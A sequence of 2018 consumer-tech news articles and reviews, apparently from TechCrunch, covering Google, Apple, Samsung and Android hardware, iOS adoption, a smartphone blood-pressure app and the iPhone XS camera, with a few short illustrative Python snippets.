With its latest consumer hardware products, Google’s prices are undercutting Apple, Samsung and Amazon. The search giant just unveiled its latest flagship smartphone, tablet and smart home device, all available at prices well below their direct competitors’. Where Apple and Samsung are pushing the prices of their latest products even higher, Google is seemingly happy to keep prices low, and this is creating a distinct advantage for the company’s products.
Google, like Amazon and unlike Apple, is a services company that happens to sell hardware. It needs to acquire users through multiple verticals, including hardware. Somewhere, deep in the Googleplex, a team of number-crunchers decided it made more sense to price its hardware dramatically lower than competitors’. If Google is taking a loss on the hardware, it is likely making it back through services.
Amazon does this with Kindle devices. Microsoft and Sony do it with game consoles. This is a proven strategy to increase market share where the revenue generated on the back end recovers the revenue lost on selling hardware with slim or negative margins.
Look at the Pixel 3. The base 64GB model is available for $799, while the base 64GB iPhone XS is $999. Want a bigger screen? The 64GB Pixel 3 XL is $899, and the 64GB iPhone XS Max is $1,099. Regarding the specs, both phones offer OLED displays and amazing cameras. There are likely pros and cons regarding the speed of the SoC, amount of RAM and wireless capabilities. Will consumers care that the screen and camera are so similar? Probably not.
Google also announced the Home Hub today. Like the Echo Show, it’s designed to be the central part of a smart home. It puts Google Assistant on a fixed screen where users can ask it questions and control a smart home. It’s $149. That’s $80 less than the Echo Show, though the Google version lacks video conferencing and a dedicated smart home hub — the Google Home Hub requires extra hardware for some smart home objects. Still, even with fewer features, the Home Hub is compelling because of its drastically lower price. For just a few dollars more than an Echo Show, a buyer could get a Home Hub and two Home Minis.
The Google Pixel Slate is Google’s answer to the iPad Pro. From everything we’ve seen, it appears to lack a lot of the processing power found in Apple’s top tablet. It doesn’t seem as refined, or as capable at specific tasks. But for viewing media, creating content and playing games, it feels just fine. It even has a Pixelbook Pen and a great keyboard, which shows Google is positioning this against the iPad Pro. And the 12.3-inch Pixel Slate is available for $599, while the 12.9-inch iPad Pro is $799.
The upfront price is just part of the equation. Considering the resale value of these devices leads to a different conclusion. Apple products consistently resell for more money than Google products. On Gazelle.com, a company that buys used smartphones, a used iPhone X is worth $425, whereas a used Pixel 2 is $195. A used iPhone 8, a phone that sold for a price closer to the Pixel 2, is worth $240.
In the end, Google likely doesn’t expect to make money off the hardware it sells. It needs users to buy into its services. The best way to do that is to make the ecosystem competitive though perhaps not investing the capital to make it the best. It needs to be just good enough, and that’s how I would describe these devices. Good enough to be competitive on a spec-to-spec basis while available for much less.
Analytics company Mixpanel is currently tracking the install base of iOS 12. And the latest version of iOS is quite popular, as it’s already installed on roughly 47.6 percent of all iOS devices; 45.6 percent of devices still run iOS 11, and 6.9 percent of iOS users run an older version.
Adoption rate is an important metric for app developers. With major iOS releases, Apple also releases new frameworks. But developers still need to support old versions of iOS for a little bit before moving entirely to newer frameworks and dropping support for old iOS versions.
But it’s interesting to see that you can already drop support for iOS 10 without losing too many customers. Chances are that users who don’t update their version of iOS don’t really care about having the latest version of your app anyway.
With iOS 11, it took much longer to reach that level. Last year, Apple announced on November 6th that iOS 11 was more popular than iOS 10. Sure, Mixpanel and Apple don’t have the exact same numbers, but you can already see that the trend is different this year.
iOS 12 focuses on performance. Apple has optimized this major release for older devices, such as the iPhone 6. All devices that run iOS 11 can update to iOS 12 as well. Basically, if you want a faster phone, you should update to iOS 12.
This is a bit counterintuitive, as previous iOS releases had rendered older devices much slower. But based on the adoption rate, it sounds like iOS users got the message.
Samsung’s last quarter of business saw its slowest growth of profits in a year thanks to weak sales of its flagship Galaxy S9 smartphone. But the company is about much more than just phones, and that’s why it is forecasting a record operating profit of nearly $15.5 billion for its upcoming Q3 results.
The Korean firm said in a filing that it expects revenue to jump five percent year-on-year, to hit 65 trillion KRW ($57.5 billion) with an operating profit of 17.5 trillion KRW ($15.5 billion), which represents a 20 percent annual jump and an 18 percent increase on the previous quarter.
Samsung’s pre-earnings filings are brief and don’t contain detailed information about the performance of its business units, thus we can’t assess demand for its high-end phones — which include the Note 9 — in the quarter that Apple unveiled its newest iPhones. But the clues suggest that it is actually the more boring (but reliable) divisions that are, once again, responsible for Samsung’s strong forecast.
Chips account for some 80 percent of Samsung’s operating profit, and demand for DRAM, which is important in areas such as cloud, pushed prices up during Q3, but analysts suspect that the growth won’t last.
“Its earnings appeared to have peaked,” Mirae Asset Daewoo Securities analyst William Park told Reuters. “DRAM prices are going to fall, although not dramatically, and that will negatively impact its margins.”
We’ll know more when Samsung releases its full earnings this month.
If a twinkle in the eye of a venture capitalist could predict the longevity of a startup, Vital Labs is going all the way.
During a quick demo of the Burlingame, Calif.-based startup’s app, called Vitality, True Ventures partner Adam D’Augelli’s enthusiasm was potent. The company, which emerges from stealth today, is pioneering a new era of personalized cardiovascular healthcare, he said.
Vitality can read changes in a person’s blood pressure using an iPhone’s camera and graphics processing power. The goal is to replace blood pressure cuffs to become the most accurate method of measuring changes in blood pressure and eventually other changes in the cardiovascular system.
The app is still in beta testing and is expected to complete an official commercial rollout in 2019.
The technology relies on a technique called photoplethysmography. By turning on the light from a phone’s flash and placing a person’s index finger over the camera on the back of the phone, the light illuminates the blood vessels in the fingertip and the camera captures changes in intensity as blood flows through the vessels with each heartbeat.
This technique results in a time-varying signal called the blood-pulse waveform (BPW). The app captures a 1080p video at 120 frames per second and processes that data in real time using the iPhone’s graphics processing unit to provide a high-resolution version of a person’s BPW.
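As a rough illustration of how a pulse rate could be pulled out of that kind of signal, here is a minimal sketch. This is not Vital Labs’ actual algorithm, and the function name and synthetic input are hypothetical; it simply strips the slow baseline drift from a series of per-frame brightness averages and times the remaining beats.

```python
import numpy as np

def estimate_heart_rate(frame_means, fps=120.0):
    """Estimate pulse rate in BPM from per-frame mean pixel intensity,
    as captured with a fingertip over the camera and flash."""
    signal = np.asarray(frame_means, dtype=float)
    # Subtract a 1-second moving average to strip baseline drift,
    # leaving only the pulsatile blood-volume component.
    window = int(fps)
    baseline = np.convolve(signal, np.ones(window) / window, mode="same")
    pulse = signal - baseline
    # Ignore the first and last second, where the moving average is unreliable.
    pulse = pulse[window:-window]
    # Find beats: positive local maxima at least 0.3 s apart (caps at 200 BPM).
    min_gap = int(0.3 * fps)
    peaks, last = [], -min_gap
    for i in range(1, len(pulse) - 1):
        if (pulse[i] > 0 and pulse[i] >= pulse[i - 1]
                and pulse[i] > pulse[i + 1] and i - last >= min_gap):
            peaks.append(i)
            last = i
    if len(peaks) < 2:
        return None
    # Median beat-to-beat interval, converted from frames to BPM.
    return 60.0 * fps / float(np.median(np.diff(peaks)))
```

Real photoplethysmography is far harder than this sketch suggests (motion artifacts, exposure changes, and the full waveform shape matter), but it shows why a 120 fps capture helps: the beat timing resolution is a function of the frame rate.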
The startup was founded by Tuhin Sinha, Ph.D., the former technical director for UCSF’s Health eHeart Study. He’s been working on the app for several years.
“Part of the reason this project strikes a chord with me is because if I look at the stats of my own family, I probably only have 20 years left,” Sinha told TechCrunch. “Most people on my dad’s side of the family have passed away before 60 from cardiovascular disease.”
Prior to joining UCSF, Sinha was an instructor at Vanderbilt University and the director of the Center for Image Analysis, where he directed and developed medical image analysis algorithms.
He linked up with True Ventures in June 2015, raising a total of $1 million from the early-stage venture capital firm.
“[Sinha] saw an opportunity to improve a stagnant practice and invented a new approach that takes full advantage of today’s technologies,” True’s D’Augelli said in a statement.
Three years after that initial funding, Sinha says Vital Labs is looking to raise another round of capital with plans to create additional digital tools to advance cardiovascular health.
Browser company Opera is back doing what it does best, offering you beautifully designed alternatives to the stock browsers from the likes of Google and Apple. This week the company brought its ‘Opera Touch’ browser to iOS to give iPhone owners a different option to the basic Safari browser.
The app was first launched for Android in April and, as we noted at the time, it reinvents a lot of the established paradigms to work well on mobile, particularly on large screens that don’t have a home button — a design that is steadily becoming the norm for premium devices on the market today.
Touch for iOS — which you can download here — will be of particular interest to owners of the iPhone X or Apple’s newest iPhone XS, iPhone XS Max and (upcoming) iPhone XR devices, since it is optimized for one-handed use. That is to say, it employs the same nifty user interface seen on the Android app (see below), which lets you open or close tabs, switch to search, and go back or forward using a menu bar located at the bottom of the screen. One thing it is missing, for now, is more comprehensive management of bookmarks.
The app also includes Opera’s ‘Flow’ technology which lets a user pass links, images and notes from their phone to an Opera browser on their computer using a “secure and private” connection.
As ever, the Opera browser comes with ad blocking built-in and there’s the company’s usual protection from cryptojacking — that’s the process of being hacked and having your CPU used to mine crypto for someone else.
All in all, the browser is worth taking for a spin if you have one of Apple’s new home button-less devices and seek an alternative to the pre-loaded Safari browser. Other options might include Google Chrome, recently given a redesign for its tenth anniversary, as well as Mozilla’s Firefox, UC Web, Dolphin and Brave.
The new iPhones have excellent cameras, to be sure. But it’s always good to verify Apple’s breathless onstage claims with first-hand reports. We have our own review of the phones and their photography systems, but teardowns provide the invaluable service of letting you see the biggest changes with your own eyes — augmented, of course, by a high-powered microscope.
Although the optics of the new camera are as far as we can tell unchanged since the X, the sensor is a new one and is worth looking closely at.
Microphotography of the sensor die shows that Apple’s claims are borne out and then some. The sensor size has increased from 32.8mm2 to 40.6mm2 — a huge difference despite the small units. Every tiny bit counts at this scale. (For comparison, the Galaxy S9 is 45mm2, and the soon-to-be-replaced Pixel 2 is 25mm2.)
The pixels themselves also, as advertised, grew from 1.22 microns (micrometers) across to 1.4 microns — which should help with image quality across the board. But there’s an interesting, subtler development that has continually but quietly changed ever since its introduction: the “focus pixels.”
That’s Apple’s brand name for phase detection autofocus (PDAF) points, found in plenty of other devices. The basic idea is that you mask off half a sub-pixel every once in a while (which I guess makes it a sub-sub-pixel), and by observing how light enters these half-covered detectors you can tell whether something is in focus or not.
Of course, you need a bunch of them to sense the image patterns with high fidelity, but you have to strike a balance: losing half a pixel may not sound like much, but if you do it a million times, that’s half a megapixel effectively down the drain. Wondering why all the PDAF points are green? Many camera sensors use an “RGBG” sub-pixel pattern, meaning there are two green sub-pixels for each red and blue one — it’s complicated why. But because there are twice as many green sub-pixels, the green channel is more robust to losing a bit of information.

Apple introduced PDAF in the iPhone 6, but as you can see in TechInsights’ great diagram, the points are pretty scarce. There’s one for maybe every 64 sub-pixels, and not only that, they’re all masked off in the same orientation: either the left or right half gone.
The 6S and 7 Pluses saw the number double to one PDAF point per 32 sub-pixels. And in the 8 Plus, the number is improved to one per 20 — but there’s another addition: now the phase detection masks are on the tops and bottoms of the sub-pixels as well. As you can imagine, doing phase detection in multiple directions is a more sophisticated proposal, but it could also significantly improve the accuracy of the process. Autofocus systems all have their weaknesses, and this may have addressed one Apple regretted in earlier iterations.
Which brings us to the XS (and Max, of course), in which the PDAF points are now one per 16 sub-pixels, having increased the frequency of the vertical phase detection points so that they’re equal in number to the horizontal ones. Clearly the experiment paid off and any consequent light loss has been mitigated or accounted for.
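To put those densities in perspective, here is some back-of-the-envelope arithmetic. This is a rough illustration only: the 12-megapixel figure is the headline pixel count, and it loosely treats pixels and sub-pixels interchangeably, which the real sensor layouts don't.

```python
def pdaf_light_loss(subpixels, per_n):
    """Given a sub-pixel count and a 'one PDAF point per N sub-pixels'
    density, return (number of PDAF points, sub-pixels' worth of
    light-gathering area masked), since each point masks half a sub-pixel."""
    points = subpixels // per_n
    return points, points * 0.5

SENSOR = 12_000_000  # illustrative 12 MP figure

for model, per_n in [("iPhone 6", 64), ("6S / 7 Plus", 32),
                     ("8 Plus", 20), ("XS", 16)]:
    points, lost = pdaf_light_loss(SENSOR, per_n)
    print(f"{model}: {points:,} PDAF points, ~{lost / 1e6:.2f} MP masked")
```

Even at the XS’s density, the masked area works out to under half a megapixel on this rough accounting, which squares with the point above: the light loss is real, but small enough to mitigate.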
I’m curious how the sub-pixel patterns of Samsung, Huawei and Google phones compare, and I’m looking into it. But I wanted to highlight this interesting little evolution. It’s an interesting example of the kind of changes that are hard to understand when explained in simple number form — we’ve doubled this, or there are a million more of that — but which make sense when you see them in physical form.
According to some early numbers from Apple analyst extraordinaire Ming-Chi Kuo, the iPhone XS Max is currently running laps around its smaller counterpart. In a note posted by MacRumors, Kuo suggested that the 6.5-inch handset sold three to four times as well as the XS during its inaugural weekend.
“We have determined that the demand for XS Max is better than expected (3-4 times that of XS),” says Kuo. “The gold and space-grey colors are significantly more popular than the silver. 256GB is the most popular, and 512GB is subject to a serious shortage because only Samsung can currently ship NAND Flash well. We are positive that XS Max shipments will grow steadily in 4Q18 thanks to demand from Asia market and the gift season.”
The higher demand shouldn’t be altogether surprising. After all, the XS doesn’t mark an earth-shattering upgrade over its predecessor. The Max, on the other hand, is a pretty sizable jump in display size for the company that once suggested consumers simply don’t want a larger phone.
And while the two models are quite similar from the standpoint of specs, the bigger display will only run an extra $100. If you’re already in for $1,000, what’s another $100 between friends, right?
The note also states that Apple Watch Series 4 demand is better than anticipated, while the iPhone XR is expected to be a good seller for the company. No surprise on that last one, really. The XR represents an attainable upgrade for those users with last year’s handset who are unwilling or unable to pull the trigger on a $1,000 phone.
It’s been 10 years since Google took the wraps off the G1, the first Android phone. Since that time the OS has grown from buggy, nerdy iPhone alternative to arguably the most popular (or at least populous) computing platform in the world. But it sure as heck didn’t get there without hitting a few bumps along the road.
Join us for a brief retrospective on the last decade of Android devices: the good, the bad, and the Nexus Q.
This is the one that started it all, and I have a soft spot in my heart for the old thing. Also known as the HTC Dream — this was back when we had an HTC, you see — the G1 was about as inauspicious a debut as you can imagine. Its full keyboard, trackball, slightly janky slide-up screen (crooked even in official photos), and considerable girth marked it from the outset as a phone only a real geek could love. Compared to the iPhone, it was like a poorly dressed whale.
But in time its half-baked software matured and its idiosyncrasies became apparent for the smart touches they were. To this day I occasionally long for a trackball or full keyboard, and while the G1 wasn’t pretty, it was tough as hell.
Of course, most people didn’t give Android a second look until Moto came out with the Droid, a slicker, thinner device from the maker of the famed RAZR. In retrospect, the Droid wasn’t that much better or different than the G1, but it was thinner, had a better screen, and had the benefit of an enormous marketing push from Motorola and Verizon. (Disclosure: Verizon owns Oath, which owns TechCrunch, but this doesn’t affect our coverage in any way.)
For many, the Droid and its immediate descendants were the first Android phones they had — something new and interesting that blew the likes of Palm out of the water, but also happened to be a lot cheaper than an iPhone.
This was the fruit of the continued collaboration between Google and HTC, and the first phone Google branded and sold itself. The Nexus One was meant to be the slick, high-quality device that would finally compete toe-to-toe with the iPhone. It ditched the keyboard, got a cool new OLED screen, and had a lovely smooth design. Unfortunately it ran into two problems.
First, the Android ecosystem was beginning to get crowded. People had lots of choices and could pick up phones for cheap that would do the basics. Why lay the cash out for a fancy new one? And second, Apple would shortly release the iPhone 4, which — and I was an Android fanboy at the time — objectively blew the Nexus One and everything else out of the water. Apple had brought a gun to a knife fight.
Another HTC? Well, this was prime time for the now-defunct company. They were taking risks no one else would, and the Evo 4G was no exception. It was, for the time, huge: the iPhone had a 3.5-inch screen, and most Android devices weren’t much bigger, if they weren’t smaller.
The Evo 4G somehow survived our criticism (our alarm now seems extremely quaint, given the size of the average phone now) and was a reasonably popular phone, but ultimately is notable not for breaking sales records but breaking the seal on the idea that a phone could be big and still make sense. (Honorable mention goes to the Droid X.)
Samsung’s big debut made a hell of a splash, with custom versions of the phone appearing in the stores of practically every carrier, each with their own name and design: the AT&T Captivate, T-Mobile Vibrant, Verizon Fascinate, and Sprint Epic 4G. As if the Android lineup wasn’t confusing enough already at the time!
Though the S was a solid phone, it wasn’t without its flaws, and the iPhone 4 made for very tough competition. But strong sales reinforced Samsung’s commitment to the platform, and the Galaxy series is still going strong today.
This was an era in which Android devices were responding to Apple, and not vice versa as we find today. So it’s no surprise that hot on the heels of the original iPad we found Google pushing a tablet-focused version of Android with its partner Motorola, which volunteered to be the guinea pig with its short-lived Xoom tablet.
Although there are still Android tablets on sale today, the Xoom represented a dead end in development — an attempt to carve a piece out of a market Apple had essentially invented and soon dominated. Android tablets from Motorola, HTC, Samsung and others were rarely anything more than adequate, though they sold well enough for a while. This illustrated the impossibility of “leading from behind” and prompted device makers to specialize rather than participate in a commodity hardware melee.
And who better to illustrate than Amazon? Its contribution to the Android world was the Fire series of tablets, which differentiated themselves from the rest by being extremely cheap and directly focused on consuming digital media. Just $200 at launch and far less later, the Fire devices catered to the regular Amazon customer whose kids were pestering them about getting a tablet on which to play Fruit Ninja or Angry Birds, but who didn’t want to shell out for an iPad.
Turns out this was a wise strategy, and of course one Amazon was uniquely positioned to do with its huge presence in online retail and the ability to subsidize the price out of the reach of competition. Fire tablets were never particularly good, but they were good enough, and for the price you paid, that was kind of a miracle.
Sony has always had a hard time with Android. For years its Xperia line of phones was considered competent — I owned a few myself — and arguably industry-leading in the camera department. But no one bought them. And the one they bought the least of, at least relative to the hype it got, has to be the Xperia Play. This thing was supposed to be a mobile gaming platform, and the idea of a slide-out gamepad is great — but the whole thing basically cratered.
What Sony had illustrated was that you couldn’t just piggyback on the popularity and diversity of Android and launch whatever the hell you wanted. Phones didn’t sell themselves, and although the idea of playing Playstation games on your phone might have sounded cool to a few nerds, it was never going to be enough to make it a million-seller. And increasingly that’s what phones needed to be.
As a sort of natural climax to the swelling phone trend, Samsung went all out with the first true “phablet,” and despite groans of protest the phone not only sold well but became a staple of the Galaxy series. In fact, it wouldn’t be long before Apple would follow on and produce a Plus-sized phone of its own.
The Note also represented a step towards using a phone for serious productivity, not just everyday smartphone stuff. It wasn’t entirely successful — Android just wasn’t ready to be highly productive — but in retrospect it was forward thinking of Samsung to make a go at it and begin to establish productivity as a core competence of the Galaxy series.
This abortive effort by Google to spread Android out into a platform was part of a number of ill-considered choices at the time. No one really knew, apparently at Google or anywhere else in the world, what this thing was supposed to do. I still don’t. As we wrote at the time:
Here’s the problem with the Nexus Q: it’s a stunningly beautiful piece of hardware that’s being let down by the software that’s supposed to control it.
It was made, or rather nearly made in the USA, though, so it had that going for it.
The First got dealt a bad hand. The phone itself was a lovely piece of hardware with an understated design and bold colors that stuck out. But its default launcher, the doomed Facebook Home, was hopelessly bad.
How bad? Announced in April, discontinued in May. I remember visiting an AT&T store during that brief period and even then the staff had been instructed in how to disable Facebook’s launcher and reveal the perfectly good phone beneath. The good news was that there were so few of these phones sold new that the entire stock started selling for peanuts on eBay and the like. I bought two and used them for my early experiments in ROMs. No regrets.
This was the beginning of the end for HTC, but their last few years saw them update their design language to something that actually rivaled Apple. The One and its successors were good phones, though HTC oversold the “Ultrapixel” camera, which turned out to not be that good, let alone iPhone-beating.
As Samsung increasingly dominated, Sony plugged away, and LG and Chinese companies increasingly entered the fray, HTC was under assault and even a solid phone series like the One couldn’t compete. 2014 was a transition period with old manufacturers dying out and the dominant ones taking over, eventually leading to the market we have today.
Google/LG Nexus 5X and Huawei Nexus 6P (2015)
This was the line that brought Google into the hardware race in earnest. After the bungled Nexus Q launch, Google needed to come out swinging, and they did that by marrying their more pedestrian hardware with some software that truly zinged. Android 5 was a dream to use, Marshmallow had features that we loved … and the phones became objects that we adored.
We called the 6P “the crown jewel of Android devices”. This was when Google took its phones to the next level and never looked back.
Google Pixel (2016)
If the Nexus was, in earnest, the starting gun for Google’s entry into the hardware race, the Pixel line could be its victory lap. It’s an honest-to-god competitor to the Apple phone.
Gone are the days when Google was playing catch-up on features to Apple; instead, Google’s a contender in its own right. The phone’s camera is amazing. The software works relatively seamlessly (bring back guest mode!), and the phone’s size and power are everything anyone could ask for. The sticker price, like that of Apple’s newest iPhones, is still a bit of a shock, but this phone is the teleological endpoint of the Android quest to rival its famous, fruitful contender.
In 2017 Andy Rubin, the creator of Android, debuted the first fruits of his new hardware startup studio, Playground Global, with the launch of Essential (and its first phone). The company had raised $300 million to bring the phone to market, and — as the first hardware device to come to market from Android’s creator — it was being heralded as the next new thing in hardware.
Here at TechCrunch, the phone received mixed reviews. Some on staff hailed the phone as the achievement of Essential’s stated vision — to create a “lovemark” for Android smartphones — while others on staff found the device… inessential.
Ultimately, the market seemed to agree. Four months ago plans for a second Essential phone were put on hold, while the company explored a sale and pursued other projects. There’s been little update since.
In the ten years since its launch, Android has become the most widely used operating system for hardware. Some version of its software can be found in roughly 2.3 billion devices around the world and it’s powering a technology revolution in countries like India and China — where mobile operating systems and access are the default. As it enters its second decade, there’s no sign that anything is going to slow its growth (or dominance) as the operating system for much of the world.
Let’s see what the next ten years bring.
The iPhone XS proves one thing definitively: that the iPhone X was probably one of the most ambitious product bets of all time.
When Apple told me in 2017 that they put aside plans for the iterative upgrade that they were going to ship and went all in on the iPhone X because they thought they could jump ahead a year, they were not blustering. That the iPhone XS feels, at least on the surface, like one of Apple’s most “S” models ever is a testament to how aggressive the iPhone X timeline was.
I think there will be plenty of people who will see this as a weakness of the iPhone XS, and I can understand their point of view. There are about a half-dozen definitive improvements in the XS over the iPhone X, but none of them has quite the buzzword-worthy effectiveness of a marquee upgrade like 64-bit, 3D Touch or wireless charging — all benefits delivered in previous “S” years.
That weakness, however, is only really present if you view it through the eyes of the year-over-year upgrader. As an upgrade over an iPhone X, I’d say you’re going to have to love what they’ve done with the camera to want to make the jump. As a move from any other device, it’s a huge win and you’re going head-first into sculpted OLED screens, face recognition and super durable gesture-first interfaces and a bunch of other genre-defining moves that Apple made in 2017, thinking about 2030, while you were sitting back there in 2016.
Since I do not have an iPhone XR, I can’t really make a call for you on that comparison, but from what I saw at the event and from what I know about the tech in the iPhone XS and XS Max from using them over the past week, I have some basic theories about how it will stack up.
For those with interest in the edge of the envelope, however, there is a lot to absorb in these two new phones, separated only by size. Once you begin to unpack the technological advancements behind each of the upgrades in the XS, you begin to understand the real competitive edge and competence of Apple’s silicon team, and how well they listen to what the software side needs now and in the future.
Whether that makes any difference for you day to day is another question, one that, as I mentioned above, really lands on how much you like the camera.
But first, let’s walk through some other interesting new stuff.
As is always true with my testing methodology, I treat this as anyone would who got a new iPhone and loaded an iCloud backup onto it. Plenty of other sites will do clean room testing if you like comparison porn, but I really don’t think that does most folks much good. By and large most people aren’t making choices between ecosystems based on one spec or another. Instead, I try to take them along on prototypical daily carries, whether to work for TechCrunch, on vacation or doing family stuff. A foot injury precluded any theme parks this year (plus, I don’t like to be predictable) so I did some office work, road travel in the center of California and some family outings to the park and zoo. A mix of use cases that involves CarPlay, navigation, photos and general use in a suburban environment.
In terms of testing locale, Fresno may not be the most metropolitan city, but it’s got some interesting conditions that set it apart from the cities where most of the iPhones are going to end up being tested. Network conditions are pretty adverse in a lot of places, for one. There’s a lot of farmland and undeveloped acreage and not all of it is covered well by wireless carriers. Then there’s the heat. Most of the year it’s above 90 degrees Fahrenheit and a good chunk of that is spent above 100. That means that batteries take an absolute beating here and often perform worse than other, more temperate, places like San Francisco. I think that’s true of a lot of places where iPhones get used, but not so much the places where they get reviewed.
That said, battery life has been hard to judge. In my rundown tests, the iPhone XS Max clearly went beast mode, outlasting my iPhone X and iPhone XS. Between those two, though, it was tougher to tell. I try to wait until the end of the period I have to test the phones to do battery stuff so that background indexing doesn’t affect the numbers. In my ‘real world’ testing in the 90+ degree heat around here, the iPhone XS did best my iPhone X by a few percentage points, which is what Apple claims, but my X is also a year old. The battery didn’t fail during even intense days of testing with the XS.
In terms of storage, I’m tapping at the door of 256GB, so the addition of a 512GB option is really nice. As always, the easiest way to determine what size you should buy is to check your existing free space. If you’re using around 50% of what your phone currently has, buy the same size. If you’re using more, consider upgrading, because these phones are only getting faster at taking better pictures and video, and that will eat up more space.
The review units I was given both had the new gold finish. As I mentioned on the day, this is a much deeper, brassier gold than the Apple Watch Edition. It’s less ‘pawn shop gold’ and more ‘this is very expensive’ gold. I like it a lot, though it is hard to photograph accurately — if you’re skeptical, try to see it in person. It has a touch of pink added in, especially as you look at the back glass along with the metal bands around the edges. The back glass has a pearlescent look now as well, and we were told that this is a new formulation that Apple created specifically with Corning. Apple says that this is the most durable glass ever in a smartphone.
My current iPhone has held up to multiple falls over 3 feet over the past year, one of which resulted in a broken screen and replacement under warranty. Doubtless multiple YouTubers will be hitting this thing with hammers and dropping it from buildings in beautiful Phantom Flex slo-mo soon enough. I didn’t test it. One thing I am interested in seeing develop, however, is how the glass holds up to fine abrasions and scratches over time.
My iPhone X is riddled with scratches both front and back, which likely has to do with the glass formulation being harder but more brittle: less likely to break on impact, but more prone to abrasion. I’m a dedicated no-caser, which is why my phone looks like it does, but there’s no way for me to tell how the iPhone XS and XS Max will hold up without giving them more time on the clock. So I’ll return to this in a few weeks.
Both the gold and space grey iPhone XS models have been subjected to a coating process called physical vapor deposition, or PVD. Basically, metal particles get vaporized and bonded to the surface to coat and color the band. PVD is a process, not a material, so I’m not sure what they’re actually coating these with, but one suggestion has been titanium nitride. I don’t mind the weathering that has happened on my iPhone X band, but I think it would look a lot worse on the gold, so I’m hoping that this process (which is known to be incredibly durable and is used in machine tooling) will improve the durability of the band. That said, I know most people are not no-casers like me, so it’s likely a moot point.
Now let’s get to the nut of it: the camera.
I’m (still) not going to be comparing the iPhone XS to an interchangeable-lens camera, because portrait mode is not a replacement for those; it’s about pulling them out less. That said, this is the closest it’s ever been.
One of the major hurdles that smartphone cameras have had to overcome in their comparisons to cameras with beautiful glass attached is their inherently deep depth of field. Without getting too into the weeds (feel free to read this for more), because they’re so small, smartphone cameras produce an incredibly compressed image that makes everything sharp. This doesn’t feel like a portrait or well-composed shot from a larger camera because it doesn’t produce background blur. That blur was added a couple of years ago with Apple’s portrait mode and has been duplicated since by every manufacturer that matters — to varying levels of success or failure.
By and large, most manufacturers do it in software. They figure out what the subject probably is, use image recognition to find where the eyes/nose/mouth triangle is, build a quick matte and blur everything else. Apple does more, adding the parallax of two lenses OR the IR projector of the TrueDepth array that enables Face ID to gather a multi-layer depth map.
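The software-only approach described above — build a matte around the subject, blur everything else — can be sketched in a few lines. This is a toy illustration on a tiny grayscale "image" represented as a 2D list, not anyone’s actual pipeline.

```python
# Toy sketch of software-only portrait mode: given an image and a binary
# subject matte, keep matte pixels sharp and box-blur everything else.
def box_blur(img, x, y):
    """Average of the 3x3 neighborhood around (x, y), clamped at edges."""
    h, w = len(img), len(img[0])
    vals = [img[j][i]
            for j in range(max(0, y - 1), min(h, y + 2))
            for i in range(max(0, x - 1), min(w, x + 2))]
    return sum(vals) / len(vals)

def portrait_blur(img, matte):
    """matte[y][x] == 1 marks the subject; everything else gets blurred."""
    return [[img[y][x] if matte[y][x] else box_blur(img, x, y)
             for x in range(len(img[0]))]
            for y in range(len(img))]

img   = [[10, 10, 10], [10, 90, 10], [10, 10, 10]]
matte = [[0, 0, 0], [0, 1, 0], [0, 0, 0]]
out = portrait_blur(img, matte)
print(out[1][1])  # subject pixel untouched: 90
```

The hard part in a real phone, of course, is producing the matte — which is exactly where the depth map and segmentation hardware come in.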
As a note, the iPhone XR works differently, and with fewer tools, to enable portrait mode. Because it only has one lens it uses focus pixels and segmentation masking to ‘fake’ the parallax of two lenses.
With the iPhone XS, Apple is continuing to push ahead with the complexity of its modeling for the portrait mode. The relatively straightforward disc blur of the past is being replaced by a true bokeh effect.
Background blur in an image is related directly to lens compression, subject-to-camera distance and aperture. Bokeh is the character of that blur. It’s more than just ‘how blurry’, it’s the shapes produced from light sources, the way they change throughout the frame from center to edges, how they diffuse color and how they interact with the sharp portions of the image.
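The relationship between aperture, distance and blur has a standard formulation in optics: the circle-of-confusion diameter from the thin-lens approximation. A quick sketch of that textbook formula (this is the generic model, not Apple’s virtual lens):

```python
# Blur-disc (circle of confusion) diameter for a background point at
# distance s2 when the lens is focused at s1 -- the standard thin-lens
# approximation. All values in millimeters; n is the f-number.
def blur_diameter_mm(f_mm, n, s1_mm, s2_mm):
    aperture = f_mm / n  # physical aperture diameter
    return aperture * abs(s2_mm - s1_mm) / s2_mm * f_mm / (s1_mm - f_mm)

# 50mm portrait lens, subject at 2m, background at 10m:
wide = blur_diameter_mm(50, 1.4, 2000, 10000)   # f/1.4: big, soft discs
stopped = blur_diameter_mm(50, 8, 2000, 10000)  # f/8: much smaller
print(round(wide, 2), round(stopped, 2))
```

The wider aperture produces a blur disc several times larger, which is exactly the relationship the iPhone’s depth slider is emulating when it shows f-stop values.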
Bokeh is to blur what seasoning is to a good meal. Unless you’re the chef, you probably don’t care what they did; you just care that it tastes great.
Well, Apple chef-ed it the hell up with this. Unwilling to settle for a templatized bokeh that felt good and leave it at that, the camera team went the extra mile and created an algorithmic model that contains virtual ‘characteristics’ of the iPhone XS’s lens. Just as a photographer might pick one lens or another for a particular effect, the camera team built out the bokeh model after testing a multitude of lenses from all of the classic camera systems.
I keep saying model because it’s important to emphasize that this is a living construct. The blur you get will look different from image to image, at different distances and in different lighting conditions, but it will stay true to the nature of the virtual lens. Apple’s bokeh has a medium-sized penumbra, spreading out light sources but not blowing them out. It maintains color nicely, making sure that the quality of light isn’t obscured like it is with so many other portrait applications in other phones that just pick a spot and create a circle of standard gaussian or disc blur.
Check out these two images, for instance. Note that when the light is circular, it retains its shape, as does the rectangular light. It is softened and blurred, as it would be when diffused through the widened aperture of a regular lens. The same goes with other shapes in reflected light scenarios.
Now here’s the same shot from an iPhone X, note the indiscriminate blur of the light. This modeling effort is why I’m glad that the adjustment slider proudly carries f-stop or aperture measurements. This is what this image would look like at a given aperture, rather than a 0-100 scale. It’s very well done and, because it’s modeled, it can be improved over time. My hope is that eventually, developers will be able to plug in their own numbers to “add lenses” to a user’s kit.
And an adjustable depth of focus isn’t just good for blurring, it’s also good for un-blurring. This portrait mode selfie placed my son in the blurry zone because it focused on my face. Sure, I could turn the portrait mode off on an iPhone X and get everything sharp, but now I can choose to “add” him to the in-focus area while still leaving the background blurry. A super cool feature that I think is going to get a lot of use.
It’s also great for removing unwanted people or things from the background by cranking up the blur.
And yes, it works on non-humans.
If you end up with an iPhone XS, I’d play with the feature a bunch to get used to what a super wide aperture lens feels like. When it’s open all the way to f/1.4 (not the actual widest aperture of the lens, by the way; this is the virtual model we’re controlling), pretty much only the eyes should be in focus. Ears, shoulders, maybe even the nose could be out of the focus area. It takes some getting used to but can produce dramatic results.
